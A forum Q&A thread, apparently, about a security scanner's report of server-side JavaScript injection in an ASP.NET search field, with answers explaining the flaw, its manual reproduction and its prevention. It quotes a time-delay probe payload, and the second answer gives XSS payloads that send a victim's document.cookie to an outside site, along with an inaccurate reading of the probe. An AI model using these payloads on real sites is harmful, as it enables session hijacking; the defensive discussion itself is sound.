Server Side JavaScript Code Injection Attack

Question

A security scan of an ASP.NET web site we are developing reported the following on an input field used for a search:

"The ctl00%24txtTopQckSearch parameter appears to be vulnerable to server-side JavaScript code injection attacks. The submitted value appears to be placed into a dynamically evaluated JavaScript statement, within a single-quoted context.

The payload '+(function(){if(typeof cb715==="undefined"){var a=new Date();do{var b=new Date();}while(b-a<20000);cb715=1;}}())+' was submitted in the ctl00%24txtTopQckSearch parameter. The application took 7641 milliseconds to respond to the request, compared with 5625 milliseconds for the original request, indicating that the injected JavaScript code caused a time delay.

Please note that to manually reproduce this behavior using the reported request, you will need to change the name of the canary variable, which is currently cb715."

My questions are:

What is "Server-Side JavaScript code injection" (as opposed to Client-Side Injection -XSS)?

How can I manually recreate the server side attack described above?

How can it be prevented?

Thanks!

Answer 1

What is "Server-Side JavaScript code injection" (as opposed to Client-Side Injection -XSS)?

It is a vulnerability that allows an attacker to execute their JavaScript code on your server (as opposed to in someone's browser).

How can I manually recreate the server side attack described above?

The report refers to a txtTopQckSearch control and says that it passed in the value +(function(){if(typeof cb715==="undefined"){var a=new Date();do{var b=new Date();}while(b-a<20000);cb715=1;}}())+ for that control.

So you can try to recreate it by

1. Figuring out which page is using a control with that name
2. Entering that JavaScript into that control (but changing the two occurrences of cb715 to a different name)
3. Submitting the page

If the scan's findings are correct, that request should take slightly longer than a request that doesn't use that value.

How can it be prevented?

Track down the txtTopQckSearch control and ensure that values received via that control are never concatenated into any code that is executed on your server.

I think it's entirely possible that this is a red herring and that the request just took a bit longer due to some fluctuation on your server (the fact that the "safe" request to that page took >5 seconds suggests that the page might have some performance problems).

One good reason to suspect that it is a red herring is that if that code had run to completion before your server sent back a response, the difference in response time would have been 20 seconds as opposed to the 2 second difference that the scan observed.

So investigate to see if there are any possible security holes with that control, and if not, write it off for now as a false positive.

Answer 2

They can inject JavaScript code. It's an XSS vulnerability.

If you have this code (don't know ASP sorry):

<div><?php echo $_GET["foo"];?></div>

It will pretty much print whatever you pass as foo. So if you get someone to load:

http://yoursite.com/index.php?foo=<script>document.location.href="http://mywebsite.com/?cookie=" + document.cookie</script>

I have now stolen their session. It injects a piece of JavaScript code that reads the cookies and sends it to my website.

A similar approach exists in JavaScript directly:

<script>var data = <?php echo $_GET["foo"];?>;</script>

Now if the value of foo is something like

"";document.location.href="http://mywebsite.com/?cookie=" + document.cookie`

I have again stolen cookies.

The way to avoid XSS is to always always always escape untrusted content. In PHP the functions are htmlspecialchars (for HTML) and json_encode (for JavaScript).

---

They detect the XSS vulnerability by injecting code that takes a long time to execute (creating 20000 Date objects) and comparing how long it takes to load the page.